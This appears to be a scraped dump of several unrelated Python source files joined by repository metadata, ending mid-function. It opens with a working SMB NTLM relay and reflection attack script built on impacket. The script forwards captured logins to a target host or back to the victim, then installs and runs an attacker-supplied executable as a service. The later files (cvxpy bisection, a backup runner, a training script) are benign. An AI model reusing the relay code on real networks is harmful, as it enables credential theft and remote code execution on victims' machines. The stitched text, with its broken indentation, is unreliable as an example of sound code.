from impacket.examples import serviceinstall
from smb import *
from smbserver import *
from threading import Thread
class doAttack(Thread):
def __init__(self, SMBClient, exeFile):
Thread.__init__(self)
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def run(self):
# Here PUT YOUR CODE!
# First of all check whether we're Guest in the target system.
# If so, we're screwed.
self.installService.install()
print "[*] Service Installed.. CONNECT!"
self.installService.uninstall()
class SMBClient(smb.SMB):
    """Client side of the relay: replays the victim's authentication blobs
    against the chosen target SMB server."""
    def __init__(self, remote_name, extended_security = True, sess_port = 445):
        # Remember whether the victim negotiated extended security so our own
        # negotiation with the target mirrors it (see neg_session()).
        self._extendedSecurity = extended_security
        smb.SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
    def neg_session(self):
        """Negotiate the SMB dialect, honoring the stored extended-security flag."""
        return smb.SMB.neg_session(self, extended_security = self._extendedSecurity)
    def setUid(self,uid):
        # Force the UID used on subsequent requests (0 resets the session).
        self._uid = uid
    def login_standard(self, user, domain, ansiPwd, unicodePwd):
        """Perform a non-extended-security SESSION_SETUP_ANDX login.

        Returns (response_packet, STATUS_SUCCESS) on success, or
        (None, STATUS_LOGON_FAILURE) when the target rejects the credentials.
        """
        # NOTE: the local name `smb` below shadows the imported `smb` module
        # for the remainder of this method.
        smb = NewSMBPacket()
        smb['Flags1'] = 8
        sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
        sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
        sessionSetup['Data'] = SMBSessionSetupAndX_Data()
        sessionSetup['Parameters']['MaxBuffer'] = 65535
        sessionSetup['Parameters']['MaxMpxCount'] = 2
        sessionSetup['Parameters']['VCNumber'] = os.getpid()
        sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
        sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
        sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
        sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
        sessionSetup['Data']['AnsiPwd'] = ansiPwd
        sessionSetup['Data']['UnicodePwd'] = unicodePwd
        sessionSetup['Data']['Account'] = str(user)
        sessionSetup['Data']['PrimaryDomain'] = str(domain)
        sessionSetup['Data']['NativeOS'] = 'Unix'
        sessionSetup['Data']['NativeLanMan'] = 'Samba'
        smb.addCommand(sessionSetup)
        self.sendSMB(smb)
        smb = self.recvSMB()
        try:
            smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
        except:
            print "[!] Error login_standard"
            return None, STATUS_LOGON_FAILURE
        else:
            # Keep the UID the server assigned for all future requests.
            self._uid = smb['Uid']
            return smb, STATUS_SUCCESS
    def sendAuth(self, authenticateMessageBlob):
        """Relay the NTLMSSP AUTHENTICATE blob to the target.

        Returns (response_packet, nt_status) where nt_status is assembled
        from the split SMB header error fields below.
        """
        smb = NewSMBPacket()
        smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
        smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
        # Are we required to sign SMB? If so we do it, if not we skip it
        if self._SignatureRequired:
           smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
        smb['Uid'] = self._uid
        sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
        sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
        sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
        sessionSetup['Parameters']['MaxBufferSize'] = 65535
        sessionSetup['Parameters']['MaxMpxCount'] = 2
        sessionSetup['Parameters']['VcNumber'] = 1
        sessionSetup['Parameters']['SessionKey'] = 0
        sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
        # Fake Data here, don't want to get us fingerprinted
        sessionSetup['Data']['NativeOS'] = 'Unix'
        sessionSetup['Data']['NativeLanMan'] = 'Samba'
        sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
        sessionSetup['Data']['SecurityBlob'] = str(authenticateMessageBlob)
        smb.addCommand(sessionSetup)
        self.sendSMB(smb)
        smb = self.recvSMB()
        # Assemble the 32-bit NT status from the three split header fields.
        errorCode = smb['ErrorCode'] << 16
        errorCode += smb['_reserved'] << 8
        errorCode += smb['ErrorClass']
        return smb, errorCode
    def sendNegotiate(self, negotiateMessage):
        """Relay the NTLMSSP NEGOTIATE blob wrapped in a SPNEGO NegTokenInit.

        Returns the target's challenge (the SPNEGO ResponseToken bytes) on
        success, or None when SESSION_SETUP_ANDX fails.
        """
        smb = NewSMBPacket()
        smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
        smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
        # Are we required to sign SMB? If so we do it, if not we skip it
        if self._SignatureRequired:
           smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
        sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
        sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
        sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
        sessionSetup['Parameters']['MaxBufferSize'] = 65535
        sessionSetup['Parameters']['MaxMpxCount'] = 2
        sessionSetup['Parameters']['VcNumber'] = 1
        sessionSetup['Parameters']['SessionKey'] = 0
        sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
        # Let's build a NegTokenInit with the NTLMSSP
        # TODO: In the future we should be able to choose different providers
        blob = SPNEGO_NegTokenInit()
        # NTLMSSP
        blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
        blob['MechToken'] = str(negotiateMessage)
        sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
        # NOTE(review): getData() result is discarded here; presumably forces
        # internal field packing before the blob is attached -- confirm.
        sessionSetup['Parameters'].getData()
        sessionSetup['Data']['SecurityBlob'] = blob.getData()
        # Fake Data here, don't want to get us fingerprinted
        sessionSetup['Data']['NativeOS'] = 'Unix'
        sessionSetup['Data']['NativeLanMan'] = 'Samba'
        smb.addCommand(sessionSetup)
        self.sendSMB(smb)
        smb = self.recvSMB()
        try:
            smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
        except:
            print "[!] SessionSetup Error!"
            return None
        else:
            # We will need to use this uid field for all future requests/responses
            self._uid = smb['Uid']
            # Now we have to extract the blob to continue the auth process
            sessionResponse = SMBCommand(smb['Data'][0])
            sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
            sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
            sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
            sessionData.fromString(sessionResponse['Data'])
            respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
            return respToken['ResponseToken']
class SMBRelayServer:
    """Server side of the relay.

    Hooks the local smbserver's NEGOTIATE and SESSION_SETUP_ANDX handlers so
    every inbound authentication is forwarded to a target host through an
    SMBClient instance, while the victim keeps talking to the local server.
    In REFLECTION mode the target is the connecting client itself.
    """
    def __init__(self):
        self.server = 0
        self.target = ''
        self.mode = 'REFLECTION'
        # Local SMB server on all interfaces, port 445, driven by smb.conf.
        self.server = smbserver.SMBSERVER(('0.0.0.0',445))
        self.server.processConfigFile('smb.conf')
        # Hook the two commands involved in authentication, keeping the
        # original handlers so normal processing continues after relaying.
        self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
        self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX)
        # Let's use the SMBServer Connection dictionary to keep track of our client connections as well
        self.server.addConnection('SMBRelay', '0.0.0.0', 445)
    def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
        """Hook for SMB_COM_NEGOTIATE: open the outbound connection to the
        target and stash it (plus the server's challenge key) for later."""
        connData = smbServer.getConnectionData(connId, checkStatus = False)
        if self.mode.upper() == 'REFLECTION':
            # Reflection: attack the very host that just connected to us.
            self.target = connData['ClientIP']
        #############################################################
        # SMBRelay
        smbData = smbServer.getConnectionData('SMBRelay', False)
        if smbData.has_key(self.target):
            # won't work until we have IPC on smbserver (if runs as ForkMixIn)
            print "[!] %s has already a connection in progress" % self.target
        else:
            print "[*] Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target)
            try:
                # Mirror the victim's extended-security choice when talking
                # to the target.
                if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0:
                    extSec = False
                else:
                    extSec = True
                client = SMBClient(self.target, extended_security = extSec)
                client.set_timeout(60)
            except Exception, e:
                print "[!] Connection against target %s FAILED" % self.target
                print e
            else:
                encryptionKey = client.get_encryption_key()
                smbData[self.target] = {}
                smbData[self.target]['SMBClient'] = client
                if encryptionKey is not None:
                    connData['EncryptionKey'] = encryptionKey
                smbServer.setConnectionData('SMBRelay', smbData)
                smbServer.setConnectionData(connId, connData)
        return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
        #############################################################
    def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
        """Hook for SMB_COM_SESSION_SETUP_ANDX: relay the authentication.

        Handles both extended security (SPNEGO/NTLMSSP NEGOTIATE -> CHALLENGE
        -> AUTHENTICATE) and standard-security logins. On a successful relayed
        login a doAttack thread is spawned against the authenticated client.
        """
        connData = smbServer.getConnectionData(connId, checkStatus = False)
        #############################################################
        # SMBRelay
        smbData = smbServer.getConnectionData('SMBRelay', False)
        #############################################################
        respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
        if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY:
            # Extended security. Here we deal with all SPNEGO stuff
            respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters()
            respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
            sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters'])
            sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
            sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
            sessionSetupData.fromString(SMBCommand['Data'])
            connData['Capabilities'] = sessionSetupParameters['Capabilities']
            if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != smb.ASN1_AID:
                # If there no GSSAPI ID, it must be an AUTH packet
                blob = smb.SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
                token = blob['ResponseToken']
            else:
                # NEGOTIATE packet
                blob = smb.SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
                token = blob['MechToken']
            # Here we only handle NTLMSSP, depending on what stage of the
            # authentication we are, we act on it
            messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
            if messageType == 0x01:
                # NEGOTIATE_MESSAGE
                negotiateMessage = ntlm.NTLMAuthNegotiate()
                negotiateMessage.fromString(token)
                # Let's store it in the connection data
                connData['NEGOTIATE_MESSAGE'] = negotiateMessage
                #############################################################
                # SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
                # Let's send it to the target server and send the answer back to the client.
                smbClient = smbData[self.target]['SMBClient']
                clientChallengeMessage = smbClient.sendNegotiate(token)
                challengeMessage = ntlm.NTLMAuthChallenge()
                challengeMessage.fromString(clientChallengeMessage)
                #############################################################
                respToken = smb.SPNEGO_NegTokenResp()
                # accept-incomplete. We want more data
                respToken['NegResult'] = '\x01'
                respToken['SupportedMech'] = smb.TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
                respToken['ResponseToken'] = str(challengeMessage)
                # Setting the packet to STATUS_MORE_PROCESSING
                errorCode = STATUS_MORE_PROCESSING_REQUIRED
                # Let's set up an UID for this connection and store it
                # in the connection's data
                # Picking a fixed value
                # TODO: Manage more UIDs for the same session
                connData['Uid'] = 10
                # Let's store it in the connection data
                connData['CHALLENGE_MESSAGE'] = challengeMessage
            elif messageType == 0x03:
                # AUTHENTICATE_MESSAGE, here we deal with authentication
                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                authenticateMessage.fromString(token)
                #############################################################
                # SMBRelay: Ok, so now the have the Auth token, let's send it
                # back to the target system and hope for the best.
                smbClient = smbData[self.target]['SMBClient']
                authData = sessionSetupData['SecurityBlob']
                clientResponse, errorCode = smbClient.sendAuth(sessionSetupData['SecurityBlob'])
                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                authenticateMessage.fromString(token)
                if errorCode != STATUS_SUCCESS:
                    # Let's return what the target returned, hope the client connects back again
                    packet = smb.NewSMBPacket()
                    packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
                    packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
                    packet['Command'] = recvPacket['Command']
                    packet['Pid'] = recvPacket['Pid']
                    packet['Tid'] = recvPacket['Tid']
                    packet['Mid'] = recvPacket['Mid']
                    packet['Uid'] = recvPacket['Uid']
                    packet['Data'] = '\x00\x00\x00'
                    packet['ErrorCode'] = errorCode >> 16
                    packet['ErrorClass'] = errorCode & 0xff
                    # Reset the UID
                    smbClient.setUid(0)
                    print "[!] Authenticating against %s as %s\%s FAILED" % (connData['ClientIP'],authenticateMessage['domain_name'], authenticateMessage['user_name'])
                    del (smbData[self.target])
                    return None, [packet], errorCode
                else:
                    # We have a session, create a thread and do whatever we want
                    print "[*] Authenticating against %s as %s\%s SUCCEED" % (connData['ClientIP'],authenticateMessage['domain_name'], authenticateMessage['user_name'])
                    del (smbData[self.target])
                    clientThread = doAttack(smbClient,self.exeFile)
                    clientThread.start()
                    # Now continue with the server
                #############################################################
                respToken = smb.SPNEGO_NegTokenResp()
                # accept-completed
                respToken['NegResult'] = '\x00'
                # Status SUCCESS
                errorCode = STATUS_SUCCESS
                # Let's store it in the connection data
                connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
            else:
                # NOTE(review): raising a plain string is invalid (TypeError on
                # Python >= 2.6); this was presumably meant to be
                # `raise Exception("Unknown NTLMSSP MessageType %d" % messageType)`.
                raise("Unknown NTLMSSP MessageType %d" % messageType)
            respParameters['SecurityBlobLength'] = len(respToken)
            respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
            respData['SecurityBlob'] = respToken.getData()
        else:
            # Process Standard Security
            respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
            respData = smb.SMBSessionSetupAndXResponse_Data()
            sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
            sessionSetupData = smb.SMBSessionSetupAndX_Data()
            sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
            sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
            sessionSetupData.fromString(SMBCommand['Data'])
            connData['Capabilities'] = sessionSetupParameters['Capabilities']
            #############################################################
            # SMBRelay
            smbClient = smbData[self.target]['SMBClient']
            clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
            if errorCode != STATUS_SUCCESS:
                # Let's return what the target returned, hope the client connects back again
                packet = smb.NewSMBPacket()
                packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
                packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
                packet['Command'] = recvPacket['Command']
                packet['Pid'] = recvPacket['Pid']
                packet['Tid'] = recvPacket['Tid']
                packet['Mid'] = recvPacket['Mid']
                packet['Uid'] = recvPacket['Uid']
                packet['Data'] = '\x00\x00\x00'
                packet['ErrorCode'] = errorCode >> 16
                packet['ErrorClass'] = errorCode & 0xff
                # Reset the UID
                smbClient.setUid(0)
                return None, [packet], errorCode
                # Now continue with the server
            else:
                # We have a session, create a thread and do whatever we want
                del (smbData[self.target])
                clientThread = doAttack(smbClient,self.exeFile)
                clientThread.start()
                # Remove the target server from our connection list, the work is done
                # Now continue with the server
            #############################################################
            # Do the verification here, for just now we grant access
            # TODO: Manage more UIDs for the same session
            errorCode = STATUS_SUCCESS
            connData['Uid'] = 10
            respParameters['Action'] = 0
        respData['NativeOS'] = smbServer.getServerOS()
        respData['NativeLanMan'] = smbServer.getServerOS()
        respSMBCommand['Parameters'] = respParameters
        respSMBCommand['Data'] = respData
        # From now on, the client can ask for other commands
        connData['Authenticated'] = True
        #############################################################
        # SMBRelay
        smbServer.setConnectionData('SMBRelay', smbData)
        #############################################################
        smbServer.setConnectionData(connId, connData)
        return [respSMBCommand], None, errorCode
    def start(self):
        """Run the hooked SMB server loop; blocks forever."""
        self.server.serve_forever()
    def setTargets(self, targets):
        # Host to relay credentials to (None in reflection mode).
        self.target = targets
    def setExeFile(self, filename):
        # Executable installed on the target once a relay succeeds.
        self.exeFile = filename
    def setMode(self,mode):
        # 'RELAY' (fixed target) or 'REFLECTION' (attack the client itself).
        self.mode = mode
# Process command-line arguments.
if __name__ == '__main__':
print version.BANNER
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will try to SMB relay that connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-h', action='store', metavar = 'HOST', help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-e', action='store', required=True, metavar = 'FILE', help='File to execute on the target system')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
try:
options = parser.parse_args()
except Exception, e:
print e
sys.exit(1)
print "[*] Setting up SMB Server"
if options.h is not None:
print "[*] Running in relay mode"
mode = 'RELAY'
targetSystem = options.h
else:
print "[*] Running in reflection mode"
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
s = SMBRelayServer()
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setMode(mode)
print "[*] Starting server, waiting for connections"
s.start()
| [
"shu@shu-GE70-0NC.(none)"
] | shu@shu-GE70-0NC.(none) |
16118184ce048e27e0f2b4faebd78b93665c7384 | dbb48e3d1fa77ada72fee41bca2a991b102b5bb4 | /saas_vlc.py~ | 2032133f1d8645ac5ae6df6fce7f16e5c517a512 | [] | no_license | coolgourav147/OwnCloud | f16e80cec6ce2751bf2ecb389fe0cac1fd06a055 | f4797c84b041d15628757a8e276e05f35ed55f18 | refs/heads/master | 2021-01-09T06:38:36.345897 | 2016-05-27T16:54:59 | 2016-05-27T16:54:59 | 59,849,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | #! /usr/bin/python
import os
# Install the OpenSSH server (requires root; assumes a yum-based distro).
os.system("yum install openssh-server -y")
# Launch VLC on the remote host with X11 forwarding enabled.
# NOTE(review): user/host are hard-coded; both commands shell out via
# os.system with fixed strings (no untrusted input involved).
os.system('ssh -X -l rohit1 192.168.0.29 vlc')
| [
"root@pagaltiger.in"
] | root@pagaltiger.in | |
73c5435838a5e04fd40ce61744fa821023bc53c3 | 149ab73e1002a0f65c988a79741167b78c7433e7 | /venv/lib/python3.8/site-packages/cvxpy/reductions/solvers/bisection.py | 6cc87bd3e76304694a4689c69013ad2599c35fcf | [] | no_license | davidtandoh/BabyInvestor-REST-API | f908984c3233cb30aea990563b9b813c21788113 | 2c69a1162aae9845d552b87410cd85597dfefe19 | refs/heads/main | 2023-01-03T13:46:37.373332 | 2020-10-29T11:20:30 | 2020-10-29T11:20:30 | 308,304,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,943 | py | """
Copyright, the CVXPY authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cvxpy.settings as s
import cvxpy.error as error
import cvxpy.problems as problems
from cvxpy.problems.objective import Minimize
from cvxpy.reductions.solution import failure_solution
def _lower_problem(problem):
    """Evaluate lazy constraints; returns the lowered feasibility problem,
    or None when a constraint reports infeasibility."""
    evaluated = []
    for constr in problem.constraints:
        # Lazy constraints are callables that may yield None (no constraint).
        realized = constr() if callable(constr) else constr
        if realized is not None:
            evaluated.append(realized)
    if s.INFEASIBLE in evaluated:
        # Indicates that the problem is infeasible.
        return None
    return problems.problem.Problem(Minimize(0), evaluated)
def _solve(problem, solver):
if problem is None:
return
problem.solve(solver=solver)
def _infeasible(problem):
return problem is None or problem.status in (s.INFEASIBLE,
s.INFEASIBLE_INACCURATE)
def _find_bisection_interval(problem, t, solver=None, low=None, high=None,
                             max_iters=100):
    """Finds an interval for bisection.

    Expands `low` downward / `high` upward (doubling each iteration) until
    the problem is infeasible at `low` and feasible at `high`, mutating
    `t.value` to probe each endpoint. Raises SolverError if no such interval
    is found within `max_iters` iterations.
    """
    if low is None:
        # A nonnegative parameter cannot go below 0.
        low = 0 if t.is_nonneg() else -1
    if high is None:
        # A nonpositive parameter cannot go above 0.
        high = 0 if t.is_nonpos() else 1
    # Sign information lets us skip probing endpoints we already know about.
    infeasible_low = t.is_nonneg()
    feasible_high = t.is_nonpos()
    for _ in range(max_iters):
        if not feasible_high:
            t.value = high
            lowered = _lower_problem(problem)
            _solve(lowered, solver)
            if _infeasible(lowered):
                # Still infeasible at `high`: move the window up and retry.
                low = high
                high *= 2
                continue
            elif lowered.status in s.SOLUTION_PRESENT:
                feasible_high = True
            else:
                raise error.SolverError(
                    "Solver failed with status %s" % lowered.status)
        if not infeasible_low:
            t.value = low
            lowered = _lower_problem(problem)
            _solve(lowered, solver=solver)
            if _infeasible(lowered):
                infeasible_low = True
            elif lowered.status in s.SOLUTION_PRESENT:
                # Still feasible at `low`: move the window down and retry.
                high = low
                low *= 2
                continue
            else:
                raise error.SolverError(
                    "Solver failed with status %s" % lowered.status)
        if infeasible_low and feasible_high:
            return low, high
    raise error.SolverError("Unable to find suitable interval for bisection.")
def _bisect(problem, solver, t, low, high, tighten_lower, tighten_higher,
            eps=1e-6, verbose=False, max_iters=100):
    """Bisect `problem` on the parameter `t`.

    Assumes the problem is infeasible at `low` and feasible at `high`.
    Returns (solution, low, high) once the interval width drops below `eps`;
    raises SolverError on solver failure or when `max_iters` is exhausted.
    """
    verbose_freq = 5
    soln = None
    for i in range(max_iters):
        assert low <= high
        if soln is not None and (high - low) <= eps:
            # the previous iteration might have been infeasible, but
            # the tighten* functions might have narrowed the interval
            # to the optimal value in the previous iteration (hence the
            # soln is not None check)
            return soln, low, high
        query_pt = (low + high) / 2.0
        if verbose and i % verbose_freq == 0:
            print(("(iteration %d) lower bound: %0.6f" % (i, low)))
            print(("(iteration %d) upper bound: %0.6f" % (i, high)))
            print(("(iteration %d) query point: %0.6f " % (i, query_pt)))
        # Probe the midpoint by fixing the parameter and solving the
        # lowered feasibility problem.
        t.value = query_pt
        lowered = _lower_problem(problem)
        _solve(lowered, solver=solver)
        if _infeasible(lowered):
            if verbose and i % verbose_freq == 0:
                print(("(iteration %d) query was infeasible.\n" % i))
            low = tighten_lower(query_pt)
        elif lowered.status in s.SOLUTION_PRESENT:
            if verbose and i % verbose_freq == 0:
                print(("(iteration %d) query was feasible. %s)\n" %
                       (i, lowered.solution)))
            # Keep the feasible solution; it corresponds to the best upper
            # bound found so far.
            soln = lowered.solution
            high = tighten_higher(query_pt)
        else:
            if verbose:
                print("Aborting; the solver failed ...\n")
            raise error.SolverError(
                "Solver failed with status %s" % lowered.status)
    raise error.SolverError("Max iters hit during bisection.")
def bisect(problem, solver=None, low=None, high=None, eps=1e-6, verbose=False,
           max_iters=100, max_iters_interval_search=100):
    """Bisection on a one-parameter family of DCP problems.

    Bisects on a one-parameter family of DCP problems emitted by `Dqcp2Dcp`.

    Parameters
    ------
    problem : Problem
        problem emitted by Dqcp2Dcp
    solver : Solver
        solver to use for bisection
    low : float
        lower bound for bisection (optional)
    high : float
        upper bound for bisection (optional)
    eps : float
        terminate bisection when width of interval is < eps
    verbose : bool
        whether to print verbose output related to the bisection
    max_iters : int
        the maximum number of iterations to run bisection

    Returns
    -------
    A Solution object.
    """
    if not hasattr(problem, '_bisection_data'):
        raise ValueError("`bisect` only accepts problems emitted by Dqcp2Dcp.")
    feas_problem, t, tighten_lower, tighten_higher = problem._bisection_data
    if verbose:
        print(("\n******************************************************"
               "**************************\n"
               "Preparing to bisect problem\n\n%s\n" % _lower_problem(problem)))
    # Check overall feasibility first; bisection is pointless otherwise.
    lowered_feas = _lower_problem(feas_problem)
    _solve(lowered_feas, solver)
    if _infeasible(lowered_feas):
        if verbose:
            print("Problem is infeasible.")
        return failure_solution(s.INFEASIBLE)
    if low is None or high is None:
        if verbose:
            print("Finding interval for bisection ...")
        low, high = _find_bisection_interval(problem, t, solver, low, high,
                                             max_iters_interval_search)
    if verbose:
        print(("initial lower bound: %0.6f" % low))
        print(("initial upper bound: %0.6f\n" % high))
    soln, low, high = _bisect(
        problem, solver, t, low, high, tighten_lower, tighten_higher,
        eps, verbose, max_iters)
    # Report the midpoint of the final interval as the optimal value.
    soln.opt_val = (low + high) / 2.0
    if verbose:
        print(("Bisection completed, with lower bound %0.6f and upper bound "
               "%0.7f\n******************************************"
               "**************************************\n"
               % (low, high)))
    return soln
| [
"davidtandoh@Davids-MacBook-Pro.local"
] | davidtandoh@Davids-MacBook-Pro.local |
658011629f392d7d437f228fd23adf37902a88a3 | 61551290cac20e3feafe2a83c9adbdabf2fd1d46 | /zfsbackup/runner/command.py | dfe0aeabb9ec76d9dfffc84a3cb136f1d3860d5c | [
"MIT"
] | permissive | g0dsCookie/zfsbackup | 8259da3c00c680af63ce306e084d10cc2b81f92f | 0449208aa85c327c2e80ba39460efb0f481a8964 | refs/heads/master | 2020-09-15T08:47:21.127812 | 2020-03-23T09:14:32 | 2020-03-23T09:14:32 | 223,399,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | from typing import List
from .base import RunnerBase
class Command(RunnerBase):
    """Runner that executes a single configured external command.

    `run()` reports success iff the command exits with status 0.
    """
    def __init__(self, name: str, cmd: str, args: List[str],
                 sudo: str, use_sudo: bool, readonly: bool, really: bool):
        # Stash everything run() will need before initializing the base.
        self._cmd = cmd
        self._arguments = args
        self._use_sudo = use_sudo
        self._readonly = readonly
        super().__init__(prog=self._cmd, sudo=sudo,
                         really=really, name=name)
    def run(self):
        """Execute the configured command; return True on exit status 0."""
        result = self._run(args=self._arguments,
                           sudo=self._use_sudo,
                           readonly=self._readonly)
        return result[0] == 0
| [
"g0dscookie@cookieprojects.de"
] | g0dscookie@cookieprojects.de |
d9e13ebc7b7b3418a217d610d03f85b4f6e99cd0 | 49bdad22c3217d5febc9b13d8d6b5a35530b0fca | /myproject/bin/sqlformat | aecb181737208f50bd53ec1257427e72a5da1719 | [] | no_license | pingam-1/my-first-blog | 87e9758f063963ced2d891c9b717e07fbce29c58 | 8a136b0acd89d4b36b946323cf0d90040fdcd8e2 | refs/heads/master | 2022-09-29T02:44:55.966367 | 2020-06-07T19:13:14 | 2020-06-07T19:13:14 | 262,886,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | #!/home/kubra/Belgeler/djangogirls/myproject/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
    # Strip setuptools' "-script.py"/".exe" wrapper suffix from argv[0]
    # so usage/help output shows the bare command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"bilgihber@gmail.com"
] | bilgihber@gmail.com | |
420f81b2c2552fd4799a23d2309c0cb150062de3 | 7abe6502f7dfdd46a7dd1a7f6ab09473d56ff171 | /train.py | fd12112b60b833e0318fdaf434e4f49e2d273aef | [] | no_license | Moveisthebest/speech-domain-adaptation-DRL | 75b9ca6545d9acbc33f3202625cfe4bc2600e624 | 9c6366da39239765e4f33954b500db40b882273d | refs/heads/master | 2021-03-12T06:53:14.377178 | 2019-05-15T02:23:07 | 2019-05-15T02:23:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,686 | py | import os
from itertools import chain
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import numpy as np
from dataloader import npyDataset2d
from model import Generator, Discriminator, ContentEncoder, StyleEncoder
from utils import Tanhize
from hparams import get_hparams
# Pin all CUDA work to the first GPU.
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
# Loss-weighting hyperparameters for the training objective.
lambda_cy = 10  # NOTE(review): presumably cycle-consistency weight -- confirm against train()
lambda_f = 1  # NOTE(review): weight usage not visible in this chunk -- confirm
lambda_s = 1  # NOTE(review): presumably style-related weight -- confirm
lambda_c = 1  # NOTE(review): presumably content-related weight -- confirm
def weights_init(m):
    """DCGAN-style initializer for `Module.apply`.

    Conv-like layers get N(0, 0.02) weights; batch-norm layers get
    N(1, 0.02) weights and zero bias. Other modules are left untouched.
    """
    layer_type = m.__class__.__name__
    if 'Conv' in layer_type:
        m.weight.data.normal_(0.0, 0.02)
    elif 'BatchNorm' in layer_type:
        m.weight.data.normal_(1.0, 0.02)
        m.bias.data.fill_(0)
def get_z_random(batch, dim1):
    """Sample a (batch, dim1) standard-normal latent tensor on the GPU."""
